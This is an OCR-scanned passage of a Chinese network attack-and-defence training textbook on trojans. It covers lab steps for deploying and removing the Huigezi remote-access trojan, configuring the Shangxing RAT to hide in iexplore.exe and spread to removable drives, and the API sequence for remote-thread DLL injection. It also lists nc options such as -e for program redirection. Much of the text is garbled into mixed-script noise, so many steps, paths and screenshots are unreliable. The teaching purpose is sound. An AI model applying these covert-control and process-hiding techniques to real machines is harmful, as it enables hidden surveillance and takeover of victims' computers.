E D: \tools\ RANAS F 2006 EAREN Vi E \ Ж. D: \tools\ RENAIS F 2006 EARR E Pre R \ 
* D; Vtools РУЛ 88 F 2006 EAEN eS VIO D:\teols\ 黑 防 永 秽 子 2006 企 业 破 解 版 \ 插 件 全 集 \ 灰 讽 ， 
= D: Moo HU EE 企业 破解 版 \ 插 件 全 集 \ zn 1 гы Qua той А ЕКИ. 
= RED 2:36 {2006 ЧИ Tez UGG. 
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只 在 程序 安装 时 加 载 插件 Ел 
文件 路 径 : Рети LIED Lum [ mm 














保存 路 径 : D Mos SUBEN А006 [PW J. [ 生成 服务 器 ] 
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В 4-13 JST ROC RAE 图 4-14 配置 服务 器 程序 成 功 

















步骤 3: 客户 端 (VPC1) 将 配置 好 的 服务 器 程序 (Server. exe) 发 给 服务 端 (VPC2) 可 以 
采用 共享 文件 夹 方 式 发 送 ,具体 设置 方法 在 此 不 再 著述 。 

步骤 4: 在 服务 端 双击 Server. exe 文件 运行 ,然后 在 客户 端 就 会 看 到 服务 器 (肉鸡 ) 已 
经 上 线 , 如 图 4-15 所 示 。 可 以 看 到 服务 器 端的 硬盘 分 区 情况 。 双 击 盘 符 ,可 以 进入 对 应 的 
硬盘 分 区 浏览 文件 ,还 可 以 进行 文件 的 删除 、 上 传 、 下 载 等 操作 。 

步骤 5: 首先 选择 “远程 控制 命令 ”选项 卡 , 然 后 再 选择 下 方 的 “系统 操作 ”选项 卡 , 单 击 
“系统 信息 ”按钮 ,可 以 看 到 如 图 4-16 所 示 的 界面 。 通 过 该 操作 界面 ,客户 端 可 以 对 服务 器 
端 进行 获取 “系统 信息 ”重启 计算 机 交 关 闭 计算 机 交 印 载 服务 端 2 等 操作 。 
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图 4-16 中 的 其 他 操作 有 剪 切 板 查 看 、 进 程 管 理 、 服 务 管理 \ 共 享 管理 、 代 理 用 
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m 
当前 连接 : | Yi-09994208318 电脑 名 称 : D99942) 连接 密码 : (Lm 
[s] 搜索 结果 : өс, 






























































В 4-16 对 “肉鸡 ”进行 远程 控制 





理 ,读者 可 以 在 实验 中 进行 测试 。 


步 又 6. 单 击 “ 捕 获 屏幕 "图标, 远程 服务 器 的 操作 窗口 将 会 显示 在 本 地 计算 机 (VPC1) 


上 ,通过 “传送 鼠标 和 键盘 操作 ”功能 还 可 以 对 服务 器 端 (VPC2) 进 行 鼠 标 和 键盘 控制 。 其 
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他 操作 包括 “保存 当前 画面 ”录制 mpeg 文件 ”发 送 组 合 键 ?等 ,读者 可 以 在 实验 中 进行 
测试 。 

步骤 7: 灰 饮 子 除 了 能 够 远程 视频 监控 外 ,还 包括 语音 监听 语音 发 送 等 功能 ,只 要 远程 
sb ал. 且 正 常 打开 时 所 需要 的 系统 资源 没有 被 占用 ,那么 读者 可 以 
看 到 远程 摄像 头 捕获 的 图 片 ,还 可 以 把 远程 摄像 头 捕获 的 画面 在 本 地 计算 机 上 进行 保存 。 
步骤 8: Telnet 远程 登录 。 客 户 端 可 以 Telnet 到 远程 被 控制 计算 机 (VPC2) ,对 远程 计 
算 机 进行 配置 操作 ,如 图 4-17 所 示 。 











Do COG 
| zt алта) = 
те ийин TAI Pope кинән 
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В 4-17 对 远程 服务 器 进行 Telnet 配置 


8085038 

灰 铝 子 的 印 载 主要 包括 以 下 几 种 方法 。 

(1) # Pi CVPCIO BLA. sh 4-18 中 的 “ 印 载 服务 端 ? 按 钮 , 即 可 完成 对 服务 器 端 
(УРС2) ШИ! Ж „ 

(2) JIR se i СУРС2) FAR X tB, АЕ À ЭС BJ а ЧН Ж ЛУ HJ ® Эу À 35 Z€ 
常 需要 通过 手动 方式 来 卸载 ,具体 方法 如 下 。 

步骤 1: 找到 灰 钥 子 服务 端 进程 ,然后 将 它 终止 。 н ici dd 
找 不 到 该 程序 ), 因 此 通过 “任务 管理 器 ”是 看 不 到 服务 端 进程 的 。 这 时 ,可 以 借助 工具 
IceSword 找到 隐藏 进程 。 本 实验 中 ,隐藏 进程 为 iexplore. pepe 上 右 击 ,在 出 
现 的 快捷 菜单 中 选择 “结束 进程 ”选项 ,如 图 4-19 所 示 。 此 时 可 以 在 客户 端 看 到 “肉鸡 ”已 经 
下 线 , 如 图 4-20 所 示 。 

步骤 2: 由 于 仅仅 结束 进程 是 没 用 的 . 当 重 新 开机 启动 时 , 灰 钥 ШК 又 会 
新 启动 ,因此 还 需 将 它 的 启动 项 删除 。 具 体 方法 为 : i 运行 "命令 框 ,输入 
“services. ms” ME ,在 打开 的 “服务 ”对 话 框 中 将 对 应 的 进程 “停止 
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自动 上 线 MERE WMSE 
当前 连接 :| YYWY-D989420F316 电脑 名 称 : | YYY-D999421| 
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连接 成 功 :WY-09994208316 成 功 ! 
驱动 器 列表 读 取 完毕 - 现在 可 以 对 主机 进行 远程 控制 了 .11:53:00 
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图 4-18 通过 客户 端 远 程 卸 载 服务 器 端 程序 





[ wyu42D46 [-[#[х] 
文件 ин 插件 外 观 帮助 
— Xm 















syst та 0 NT 05 Kernel 0 058055000 Ready 

Essen 4 NT 05 Kernel 8 0x66385B98 Ready 

If ctfmon.exe 304 C: WINDOWS syst en32 Vct fnon. ехе 8 OxGSEBEDAO Idle 

Pss. exe 360 C: WINDOWS systen32 sns. exe 11 0x6624EAT0 — Idle 

csrss. exe 596 C: WINDOWS systen32Vesrss. ехе 13 0x8631C458 Ready 

@ ee 620 С: WINDOWS systenS2 Wwinlogon. ex 13 0х88235А88 Ready 
services exe 864 C: WINDOWS systen32 servi ces. exe 9 0x86252700 Ready 

Eh exe БТБ C:\WINDOWS\systen32\lsass. exe 9 0588230210 Ready 

内 核 模块 。 | 回 :vehost ere 840 C:\WINDOWS\systen32\svehost. exe 8 OxBSPEDDAD Ready 
加 svehost, exe 920 CC:\WINDOWS\systen32\svehost. exe 8 0x85P90488 Ready 

四 svehost. exe 1012 C: WINDOWS systen32 svchost. exe 8 058631278 Ready 

四 svehost. exe 1068 C: WINDOWS systen32 svchost. exe в Ox&SPABOB Idla 

启动 组 E spoolsv. exe. 1940 С: WINDOWS systen32Vspoolsv. exe 8 066315558 Idle 
880507001. exe 1384  C:XPROGRA"1VSOGDUT "1 V5SO"1. 9184507001. exe 8 0x65F2TDAD Idle 

区 El svchost, exe 8 0x6631CC10 — Idle 









IEXPLORE EXE 508 C:\Progran Fil 
服务 {IceSword. exe 1632 D:\tools\IceSwd 056628FSD0 

9 explorer. exe. 2016 C: WTNDOYSNexp] 8 OxGSEETÉAQ Ready 
V 








4-19 “结束 进程 选项 


步骤 3: 将 灰 铝 子 启动 服务 删除 。 选 择 * 开 始 ” 一 运行 ”一 regedit 选项 ,打开 “注册 表 编 
辑 器 ”对话 框 ,找到 注册 表 项 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ 


Services ,删除 Windows Power Control, 
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这 入 成 功 :WW-09994205516 EID! _ 
驱动 器 列表 读 取 完 毕 . 现在 可 以 对 主机 进行 运程 控制 了 ，12:05:02 


E 
图 4-20 在 客户 端 看 到 “肉鸡 "已 经 下 线 
步骤 4: 清除 灰 伍 子 文件 。 在 图 4-21 所 示 的 “注册 表 编 辑 器 ”对话 框 中 可 以 看 到 灰 鸽子 
的 安装 路 径 为 C:\Windows\12345. ini, 即 配置 服务 器 时 系统 使 用 的 安装 路 径 ,需要 在 服务 
器 端 将 该 文件 删除 。 















































EN ARX BH] 
с) REO 查看 WV) BERA) 帮助 00 

ат A| sm o BH E 0 
SE ubb жі) REG SZ GARED 
外国 usbuhei [Description — REG Sz SES 电源 
8 CI ese 0: х1 ауН але REG SZ 

а са ErrerCentrol ЕВО DWORD 
ЕТТ 
® Са vas [aB]0b j ectNane REG SZ ocalSystem 
daso start REG_DORD Ox00000002 (2) 
збу т» REG_DYORD Ox00000110 (272) 











图 4-21 “注册 表 编 辑 器 "对话 框 中 发 现 的 “12345. ini" 文 件 所 在 的 位 置 


需要 说 明 的 是 ,如 果 读 者 在 C:\Windows 目录 下 没有 找到 该 文件 ,可 以 选择 “工具 ”一 
“文件 夹 ” 选 项 ,在 打开 的 如 图 4-22 所 示 的 对 话 框 中 .取消 选中 “隐藏 受 保护 的 操作 系统 文件 
(推荐 )” 复 选 框 ,选中 “隐藏 文件 和 文件 夹 ” 中 的 “显示 所 有 文件 和 文件 夹 " 复 选 框 ,此 时 在 
C:\Windows 目录 中 就 可 以 找到 被 隐藏 的 文件 "12345. ini”, 
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图 422 显示 所 有 文件 和 文件 来 


4.2.4 任务 与 思 


网 页 木马 对 应 于 客户 端 感染 的 两 个 阶段 如 下 。 

1. 漏洞 利用 阶段 

网 页 木马 被 客户 端 加 载 后 ,攻击 代码 所 在 的 程序 利用 内 存 破 坏 类 漏洞 将 执行 流 跳 转 到 
ShellCode 或 直接 利用 任意 下 载 的 API, 在 客户 端 下 载 ,执行 盗号 木马 或 伪 尸 程序 。 

2. 恶意 程序 执行 阶段 

下 载 的 盗号 木马 或 僵尸 程序 等 恶意 程序 ,窃取 客户 端的 账号 等 隐私 信息 或 使 客户 端 成 
为 “肉鸡 ”加 入 僵尸 网 络 。 

本 实验 通过 对 灰 钥 子 木 马 工具 的 介绍 ,使 读者 对 木马 的 攻击 过 程 有 了 一 个 较为 宏观 的 
认识 。 尤 其 是 通过 本 实验 ,可 以 充分 理解 木马 的 工作 原理 ,能 够 将 木马 与 其 他 的 恶意 代码 在 
实现 功能 上 区 别 开 来 。 

从 技术 上 讲 , 本 实验 中 介绍 的 灰 钥 子 工具 ,其 实质 是 一 个 远程 控制 工具 。 远 程控 制 工具 
一 般 应 用 在 网 络 管理 工作 中 ,如 网 络 管理 人 员 可 以 通过 远程 控制 方式 来 对 远程 主机 进行 配 
置 和 管理 。 但 是 ,如 果 将 这 一 工具 应 用 到 攻击 过 程 中 ,将 会 带 来 巨大 的 安全 威胁 。 

为 此 ,读者 在 完成 本 实验 后 ,需要 从 安全 防范 要 求 出 发 ,继续 学 习 和 掌握 有 关 木 马 攻 半 
的 安全 防范 方法 。 





Ert 


4.3 木马 隐藏 分 析 


4.3.1 预备 知识 : 木马 的 隐藏 方式 
躲避 防火 墙 和 安全 软件 的 发 现 是 木马 程序 应 具备 的 最 基本 的 功能 ,木马 程序 需要 采用 
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各 种 方式 隐藏 自己 ,避免 被 安全 系统 发 现 和 追踪 。 木 马 一 般 采 用 本 地 隐藏 和 通信 隐藏 两 种 
е 

1. 本 地 隐藏 

为 了 隐藏 自己 ,早期 木马 将 自己 设置 为 隐藏 文件 ,或 者 命名 为 系统 文件 ,但 是 这 些 方法 
已 经 能 够 被 绝 大 多 数 安全 软件 很 容易 地 发 现 , 为 了 自身 的 存在 ,木马 必须 寻找 更 隐蔽 的 隐藏 
方式 。 本 地 隐藏 方式 可 以 分 为 以 下 几 种 类 型 。 

CD 寄宿 隐藏 。 寄 宿 隐藏 是 将 木马 程序 隐藏 在 正常 程序 中 ,程序 成 为 了 木马 的 载体 ,对 
于 一 些 不 熟悉 操作 系统 工作 机 制 或 粗心 的 用 户 比 较 有 效 。 

(2) 变化 隐藏 。 变 化 隐藏 则 在 不 改变 环境 的 情况 下 进行 自我 变化 ,通过 更 改 文件 名 、 时 
là] 注册 表 等 方式 来 迷惑 目标 用 户 。 

(3) 协作 隐藏 。 协 作 隐 藏 则 将 木马 分 成 几 个 部 分 隐藏 在 不 同位 置 ,相互 监视 协助 ,是 一 
种 较为 顽固 的 木马 ,全 面 查 杀 存在 一 定 的 难度 。 

2. 通信 隐藏 

通信 端口 会 暴露 木马 的 存在 ,因此 木马 将 控制 端 设置 为 服务 端 ,通过 控制 端 主动 监测 并 
进行 通信 ,能 够 绕 过 防火 墙 。 通 过 建立 触发 机 制 , 当 服 务 端 运行 网 络 程序 后 木马 会 取得 系统 
控制 权 , 通 过 端口 完成 外 部 通信 。 


4.3.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,读者 将 达到 以 下 学 习 目 的 。 

(1) 了 解 木 马 隐藏 技术 的 基本 原理 。 

(2) 提高 木马 攻击 的 防范 意识 。 

(3) 明确 木马 技术 的 发 展 方向 。 

(4) 学 会 使 用 木马 防范 的 相关 工具 。 

2. 实验 条 件 

本 实验 建议 读者 在 虚拟 机 环境 下 进行 ,需要 提供 两 台 虚拟 机 ,分 别 为 客户 端 计算 机 
VPC1 和 服务 器 端 计算 机 VPC2 ,操作 系统 可 以 同时 使 用 Windows XP 或 其 他 的 版 本 ,而 且 
将 VPC1 和 VPC2 设置 在 同一 网 段 ,以 便于 相互 之 间 的 通信 。 

另外 ,还 需要 准备 “上 兴 远 程控 制 ? 工 具 , 该 工具 是 一 款 小 巧 简单 的 远程 监控 软件 ,可 以 
在 实验 环境 下 实现 木马 的 隐藏 功能 。 


4.3.3 实验 过 程 


步骤 1: 正常 登录 到 实验 环境 中 的 攻击 者 VPC2(IP 地 址 为 172. 17. 135. 28) 和 VPC1 
ЙЛ. (АР 地 址 为 172. 17. 135. 27) ,分 别 使 用 “ping” 命 令 测 试 对 方 IP 地 址 的 连通 性 ,确保 
VPC1 和 VPC2 之 间 能 够 正常 通信 。 

步骤 2: 生成 木马 服务 器 端 程序 。 在 攻击 机 VPC 上 ,运行 上 兴 远 程控 制 工具 ,打开 如 
图 4-23 所 示 的 操作 窗口 。 
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步骤 З. 选择 “文件 ”一 
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В 4-23 上 兴 远 程控 制 工具 操作 窗口 
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“配置 服务 程序 ”选项 ,在 打开 的 如 图 4-24 所 示 的 对 话 框 中 对 服 


务 器 端 进行 配置 。 其 中 ,IP 地 址 填写 172. 17. 135. 28:8181(VPC2 的 IP 地 址 和 端口 ) ,其 他 
信息 的 填写 和 配置 可 以 通过 单 击 “ 填 写 说 明 " 按 钮 后 ,根据 提示 信息 进行 设置 。 


TOME S x 
Ipfime Ubi. Пи АНТА Ф БІР 详细 帮助 
| 向 示 : 先 申请 一 个 动态 解析 域名 或 FTP, я ИННА 











йай: [pi [у] 
жюн: meak ë ëB 
=a 1 бу] 
йәш ш | =. 
inar: [йе | | 更 改 图 标 | 
(v 使 用 正 浏览 器 进程 启动 服务 端 辽 防火 培 ) 
同 插 systen32 目 录 的 系统 文件 :nstsc ee 站] 
局 修 改 日 期 过 主动 v 无 特征 复制 到 目录 
Г 2K/XP/2003 下 隐语 进程 r 感染 硬盘 , 移动 设备 
P 运行 后 自动 册 除 安装 文件 
гаттан а 
| 
服务 显示 名 称 : | Windows_rejoice2008_601 | 


жав: [DusSNESE — | 


v 自 克隆 保护 文件 安装 路 径 : Prora Filesl|-] 
保护 文件 插入 的 系统 文件 : [edem |] 
mea: WEE am 


用 户 : | | m: | ] 


теков: | 


图 4-24 配置 服务 器 端 
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步骤 4: 单 击 “生成 服务 端 ? 按 钮 ,将 生成 木马 程序 。 将 生成 的 木马 程序 复制 到 靶 机 
VPCICP 地 址 为 172. 17. 135. 27) 端 。 

步骤 5: 在 172.17.135.27(VPC1) 端 双击 木马 客户 端 ,使 靶 机 植 人 木马 ,并 接受 控制 端 
的 控制 。 

步骤 6: 这 时 ,在 靶 机 上 打开 * 任 务 管理 器 ”, 并 不 会 发 现 木 马 程序 对 应 的 进程 ,但 是 细心 
的 读者 会 发 现 ,IEXPLORE. ЕХЕ 和 calc. exe 两 个 进程 存在 可 疑 , 如 图 4-25 所 示 , 因 为 在 靶 
机 上 并 没有 启用 这 两 个 进程 对 应 的 程序 。 有 这 两 个 进程 的 原因 在 于 制作 木马 时 选择 了 插入 
相关 进程 ,从 而 实现 了 进程 的 隐藏 。 
号 Windovs 任务 管理 器 Ee 
Хт) Жо) 查看 W) 关机 WW) 帮助 00 
应 用 程序 | 进程 [mi | 联网 [用 户 | 













































ийй „Ра ти птен) а! 
tntsvr. exe SYSTEN 00 3,952 K 
svchost. ехе LOCAL SERVICE 00 3,596 K 
taskagr exe Administrator 020 5,035 K 
SISIE DB 
ninistrator 00 4,844 К 
svehost, exe SYSTEN 00 16,548 К 
svchost. exe NETWORK SERVICE 00 4300 X |. 
conine. exe Adninistrator 00 3,184 K 
svchost. exe STEM 0 — 534K 
lsass. exe SYSTEM 00 2,276 K 
п 777 
00 6,520 K 
ctfnon. exe Adninistrator 00 3,996 K 
explorer.exe — Administrator 00 17,888 K 
snis. exe SYSTEN 00 «вк | 
口 显示 所 有 用 户 的 进程 5) 结束 进程 下 ) 
| 进程 数 : 24 CPU 使 用 ; 2% RIER. 1054 / 1436M 





图 4-25 ”发 现 可 疑 进程 

步骤 7: 可 以 借助 Wsyscheck 工具 检查 靶 机 的 进程 ,如 图 4-26 所 示 , 读 者 会 发 现 ， 
IEXPLORE. EXE 和 calc. exe 两 个 进程 确实 存在 安全 问题 ,在 Wsyscheck 工具 的 “安全 检 
查 ” 中 还 可 以 发 现 木 马 程序 的 服务 项 。 


кейс) IRU) 
ism |р | 服务 管理 | 安全 检查 | 文人 管理 | imeem | oap | 
Л 





























тебе лип ш 





图 4-26 使 用 Wsyscheck 工具 检查 进程 
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Wsyscheck 是 一 款 功 能 较为 强大 的 系统 检测 和 维护 工具 ,可 以 对 操作 系统 的 进程 和 服 
务 驱动 进行 检查 。 


4.3.4 任务 与 思 


通过 本 实验 ,使 读者 对 木马 的 产生 和 隐藏 方法 有 了 一 个 主观 的 认识 ,在 该 实验 的 基础 
上 ,读者 还 需要 对 木马 的 隐藏 方式 进行 深入 的 学 习 。 

木马 程序 隐藏 通常 指 利用 各 种 手段 伪装 木马 程序 ,让 一 般 用 户 无 法 从 表面 上 直接 识别 
出 木马 程序 。 要 达到 这 一 目的 可 以 通过 程序 捆绑 的 方式 实现 ,程序 捆绑 方式 是 将 多 个 . exe 
程序 链接 在 一 起 组 合成 一 个 EXE 文件 , 当 运 行 该 EXE 文件 时 ,多 个 程序 同时 运行 。 程 序 捆 
绑 有 多 种 方式 ,如 将 多 个 EXE 文件 组 合 到 一 个 EXE 文件 中 、 利 用 专用 的 安装 打包 工具 将 多 
个 EXE 文件 进行 组 合 ,这 也 是 许多 程序 捆绑 流 谍 软件 的 做 法 。 

因此 ,木马 程序 可 以 利用 程序 捆绑 的 方式 ,将 自己 和 正常 的 EXE 文件 进行 捆绑 。 当 双 
击 运行 捆绑 后 的 程序 时 ,在 正常 EXE 文件 运行 的 同时 ,木马 程序 也 在 后 台 悄 悄 地 运行 。 

程序 隐藏 只 能 达到 从 表面 上 无 法 识别 木马 程序 的 目的 ,但 是 可 以 在 “任务 管理 器 ”中 发 
现 木 马 程序 的 踪迹 ,这 就 需要 木马 程序 实现 进程 隐藏 。 隐 藏 木马 程序 的 进程 在 显示 时 能 够 
防止 用 户 通过 ”任务 管理 器 ?查看 到 木马 程序 的 进程 ,从 而 提高 木马 程序 的 隐蔽 性 。 目 前 , 隐 
藏 木马 进程 主要 有 如 下 两 种 方式 。 

1. API 拦截 

API 拦截 技术 属于 进程 伪 隐 藏 方式 , 它 通过 利用 Hook( 钓 子 ) 技 术 监 控 并 截获 系统 中 
某 些 程序 对 进程 显示 的 API 函数 调用 ,然后 修改 函数 返回 的 进程 信息 ,将 自己 从 结果 中 删 
除 , 导 致 “任务 管理 器 ”等 系统 工具 无 法 显示 该 木马 进程 。 

API 拦截 的 具体 实现 过 程 是 : 木马 程序 建立 一 个 后 台 的 系统 钧 子 (Hook) ,拦截 PSAPI 
的 EnumProcessModules 等 相关 函数 的 调用 , 当 检 测 到 结果 为 该 木马 程序 的 进程 ID(PID) 
时 直接 跳 过 ,这 样 进程 信息 中 就 不 会 包含 该 木马 程序 的 进程 ,从 而 达到 隐藏 木马 进程 的 
目的 。 

2. 远程 线程 注入 

远程 线程 注入 属于 进程 真 隐藏 方式 , 它 主要 利用 CreateRemoteThread 函数 在 某 一 个 
目标 进程 中 创建 远程 线程 ,共享 目标 进程 的 地 址 空间 ,并 获得 目标 进程 的 相关 权限 ,从 而 修 
改 目标 进程 内 部 数据 和 启动 dll 木马 。 通 过 这 种 方式 启动 的 dll 木马 占用 的 是 目标 进程 的 
地 址 空间 ,而 且 自身 是 作为 目标 进程 的 一 个 线程 ,所 以 它 不 会 出 现在 进程 列表 中 。dll 木马 
的 实现 过 程 如 下 。 

CD 通过 OpenProcess 函数 打开 目标 进程 。 

(2) 计算 dll 路 径 名 需要 的 地 址 空间 ,并 根据 计算 结果 调用 VirtualAllocEx 函数 在 目标 
进程 中 申请 一 块 大 小 合适 的 内 存 空 间 。 

(3) 调用 WriteProcessMemory 函数 将 dll 的 路 径 名 写 入 申请 到 的 内 存 空 间 中 。 

(4) 利用 函数 GetProcAddress 计算 LoadLibraryW 的 入 口 地 址 ,并 将 LoadLibraryW 
的 入 口 地 址 作为 远程 线程 的 入 口 地 址 。 

(5) 通过 函数 CreateRemoteThread 在 目标 进程 中 创建 远程 线程 。 
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通过 以 上 步骤 就 可 以 实现 远程 线程 注入 启动 dll 木马 ,达到 隐藏 木马 进程 的 目的 。 而 
H. ,远程 线程 注入 方式 与 其 他 进程 隐藏 技术 相 比 ,具有 更 强 的 隐 项 性 和 反 查 杀 能 力 , 增 加 了 
木马 的 生存 能 力 。 


4.4 木马 攻击 辅助 分 析 : 文件 .注册 表 修 改 监 视 


4.4.1 预备 知识 : 木马 攻击 辅助 分 析 工 具 介 绍 

木马 作为 一 种 特殊 的 恶意 代码 对 网 络 安全 构成 了 很 大 的 威胁 。 加 强 木马 的 检测 和 防范 
是 一 种 非常 重要 的 工作 。 下 面 介绍 3 个 典型 的 木马 攻击 辅助 分 析 工 具 。 

1. 文件 系统 监视 软件 Filemon 

Filemon 是 一 款 文件 系统 监视 软件 , 它 可 以 监视 应 用 程序 进行 的 文件 读 写 操作 ,并 能 够 
将 所 有 与 文件 相关 的 操作 (如 读 取 、 修 改 . 出 错 信息 等 ) 全 部 记录 下 来 以 供用 户 参 考 ,并 允许 
用 户 对 记录 的 信息 进行 保存 .过 滤 ,查找 等 处 理 ,为 用 户 对 系统 的 维护 提供 了 极 大 的 便利 。 

2. 文件 监视 软件 FileChangeNotify 

FileChangeNotify 文件 监视 软件 可 以 监视 目录 和 与 之 相关 内 容 的 变化 。 例 如 ,在 目录 
下 创建 子 目录 或 文件 等 操作 ,都 可 以 被 监测 到 。 

3. 注册 表 数 据 库 监视 软件 Regmon 

Regmon(Registry Monitor) 是 一 款 注册 表 数 据 库 监视 软件 , 它 将 与 注册 表 数 据 库 相 关 
的 一 切 操作 (如 读 取 、 修 改 、 删 除 等 ) 全 部 记录 下 来 以 供用 户 参 考 , 并 允许 用 户 对 记录 的 信息 
进行 保存 ,过滤 、 查 找 等 处 理 。 
4.4.2 实验 目的 和 条 件 


1. 实验 目的 

本 实验 通过 对 几 个 工具 软件 使 用 方法 的 介绍 ,让 读者 对 涉及 的 一 些 重 要 应 用 和 操作 进 
行 安全 监控 ,并 能 够 通过 对 监控 数据 的 分 析 发 现 系 统 中 存在 的 安全 威胁 。 从 操作 层面 上 看 ， 
需要 读者 主要 掌握 Filemon,FileChangeNotify 和 Regmon 软件 的 功能 特点 和 使 用 方法 。 

2. 实验 条 件 

本 实验 可 以 在 一 台 运 行 Windows Server 2003 及 以 上 版 本 操作 系统 的 主机 上 进行 ,在 
开始 实验 之 前 ,需要 安装 Filemon、FileChangeNotify 和 Regmon 软件 。 在 本 实验 中 ,将 所 需 
要 的 软件 先 保存 在 D:\tools 文件 夹 中 。 


4.4.3 实验 过 程 


步骤 1: 以 Administrator 身份 正常 登录 实验 中 的 主机 后 ,进入 D: Ntools 下 的 filemon 
文件 夹 ,找到 Filemon. exe 软件 ,双击 打开 , 即 可 进入 Filemon 软件 界面 。 

步骤 2: 运行 Filemon 软件 后 , 即 可 把 所 有 与 文件 相关 的 操作 全 部 记录 下 来 ,如 图 4-27 
所 示 , 而 且 可 以 根据 序号 、 时 间 、 进 程 、 请 求 、 路 径 、 结 果 等 来 查看 相关 的 内 容 。 
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图 4-27 Filemon 记录 的 与 文件 相关 的 操作 


步骤 3: 选取 需要 查看 的 进程 并 右 击 , 在 出 现 的 快捷 菜单 中 选择 “进程 属性 ”选项 ,将 打 
开 如 图 4-28 所 示 的 对 话 框 ,在 其 中 显示 该 进程 文件 所 在 的 位 置信 息 。 


шн 


IE 


< ууш тиб атш esi ида Вагони тиш. 
ттн пыс таспен опао еа d: 
сляти азза унал 6 биго. 


BH 


НН 


Оло: Open тешен al access: 
е" 


олмеш: Open ает аі access: 
era 


ИШ 


caen s Тарас ааа e Laen 
лохина эл Selt inpr e erii ierra] 
сласт s а Seiten e титс суша. 


БЕРЕТЕ 





TECELLEELLEL 














шш" ШШШ 





图 428 显示 进程 文件 所 在 的 位 置信 息 
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步骤 4: 双击 某 个 进程 ,可 以 打开 该 进程 文件 所 在 的 文件 夹 ,如 图 4-29 所 示 。 







S 
2013-12-24 10:01 S 
2013-12-24 10:0 5 
2013-12-24 10:0 5 
2013-12-24 10:0 Ж 
2014-2-T 13:24 А 


ËB © Application Data. 
Ë @ ноту 
外 rm 


B © Tenporary Internet Files 
a 











图 4-29 定位 进程 文件 所 在 的 文件 夹 


步骤 5: 选择 "文件 ”一 “另存 为 ?选项 , 即 可 将 该 信息 保存 下 来 , 供 分 析 使 用 。 


步骤 6: 运行 D:\tools 文件 夹 下 的 FileChangeNotify. exe 软件 ,在 打开 的 如 图 4-30 所 
示 的 对 话 框 中 单 击 “ 开 始 监视 ?按钮 , 即 可 对 文件 进行 监视 。 





图 4-30 FileChangeNotify 软件 开始 对 文件 进行 监视 


138 网 络 攻击 与 防御 实 训 





ERT: 读者 可 以 尝试 在 桌面 上 建立 一 个 名 称 为 “新 建文 件 夹 ”的 文件 夹 (文件 名 自 定 )， 
当 返 回 FileChangeNotify 窗口 时 ,就 会 发 现 该 操作 已 被 监视 到 ,并 记录 下 来 ,如 图 4-31 
所 示 。 








图 4-31 FileChangeNotify 软件 已 经 监视 了 新 创建 的 文件 夹 


步 又 8. 随后 ,如 果 先 将 前 面 创建 的 “新 建文 件 夹 ”" 的 名 称 修改 为 test, 再 将 其 删除 , 当 返 
回 FileChangeNotify 窗口 时 ,会 发 现 该 操作 全 部 被 记录 下 来 ,如 图 4-32 所 示 。 





序 一 ; 减 功 ! 
RS анан кы кнр Мынча 
MA Сү Rt ERR A 
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4-32 FileChangeNotify 记录 下 了 文件 夹 名 称 修改 和 删除 的 信息 


步骤 9: 打开 D:\tools\Regmon 文件 夹 ,运行 Regmon 软件 ,打开 如 图 4-33 所 示 的 
Regmon 操作 界面 (该 界面 与 Filemon 非常 相似 ) ,对 注册 表 信 息 进行 查看 。 
步骤 10: 双击 任意 进程 ,可 以 看 到 该 进程 所 在 注册 表 的 位 置 , 如 图 4-34 所 示 。 
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图 4-34 定位 进程 在 注册 表 中 的 位 置 
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4.4.4 任务 与 思 


本 实验 通过 对 3 个 工具 的 介绍 ,使 读者 掌握 了 当 系 统 中 的 文件 ,文件 夹 、 注 册 表 等 内 容 
发 生 改 变 时 ,如 何 对 这 些 操作 进行 监视 和 记录 。 从 安全 防范 角度 来 讲 , 这 些 操作 对 防止 攻击 
者 入 侵 是 非常 有 帮助 的 。 尤 其 是 为 用 户 提供 资源 服务 的 服务 器 系统 ,有 哪些 用 户 在 什么 时 
间 对 哪些 文件 系统 和 注册 表 进 行 了 操作 ,这 些 信息 管理 人 员 都 必须 实时 掌握 ,并 能 够 根据 记 
录 信 息 动态 分 析 资 源 的 访问 情况 ,同时 能 够 对 系统 应 用 的 安全 性 提供 准确 信息 。 

在 此 基础 上 ,读者 需要 对 木马 的 防范 方法 进行 全 面 深 入 的 学 习 。 例 如 ,在 Windows 系 
统 中 ,如 何 通 过 查看 开放 端口 .注册 表 和 系统 配置 文件 等 方式 来 发 现 木 马 。 除 此 之 外 ,用 户 
还 可 以 通过 查看 系统 进程 和 使 用 专用 木马 检测 软件 ,来 判断 系统 中 是 否 存 在 木马 。 

读者 可 将 这 些 与 木马 防范 相关 的 知识 与 本 实验 中 所 涉及 的 工具 应 用 功能 结合 起 来 , 进 
而 对 系统 的 安全 提供 相应 的 保护 措施 。 





4.5 x FRAG 


4.5.1 预备 知识 : Metaspolit 工具 使 用 方法 


Metasploit 是 一 款 开源 的 安全 漏洞 检测 工具 ,安全 人 员 常 用 Metasploit 工具 来 检测 系 
统 的 安全 性 。Metasploit Framework(MSF) 是 2003 年 以 开放 源 代码 方式 发 布 . 可 自由 获取 
的 开发 框架 ,为 渗透 测试 .shellcode 编写 和 漏洞 研究 提供 了 一 个 可 靠 的 平台 。MSF 集成 了 
各 平台 上 常见 的 溢出 漏洞 和 流行 的 shellcode, 并 且 不 断 进行 更 新 和 完善 。 作 为 安全 工具 ， 
MSF 提供 了 强大 的 安全 检测 功能 ,并 为 漏洞 自动 化 探测 和 及 时 检测 系统 漏洞 提供 有 力 的 
保障 。 

(1) MSF 提供 的 主要 远程 攻击 命令 。 

at; 查看 本 地 计算 机 上 的 计划 作业 。 

atip: 查看 远程 计算 机 上 的 计划 作业 ,其 中 ,ip 为 远程 计算 机 使 用 的 IP 地 址 。 

atip 时 间 命 令 ( 注 意 加 盘 符 ) : 在 远程 计算 机 上 添加 一 个 作业 。 

айр 计划 作业 id/delete: 删除 远程 计算 机 上 的 一 个 计划 作业 。 

atip all/delete: 删除 远程 计算 机 上 的 全 部 计划 作业 。 

(2) nc 命令 常用 的 参数 。 

nc. exe 是 一 个 可 对 远程 主机 进行 各 类 操作 的 网 络 工 具 , 主 要 参数 含义 如 下 。 

-h: 查看 帮助 信息 。 

-eprog: 程序 重 定 向 ,一 旦 连接 就 执行 。 

-1: 监听 模式 ,用 于 入 站 连接 。 

-t: 使 用 Telnet 交互 方式 。 

(3) пс 命令 的 基本 用 法 。 

为 便于 实验 操作 ,下 面 介绍 “nc” 命令 的 几 个 常见 使 用 方法 。 

nc -nvv 192. 168. 0. 1 80: 连接 到 192. 168. 0. 1 主机 的 80 端口 。 

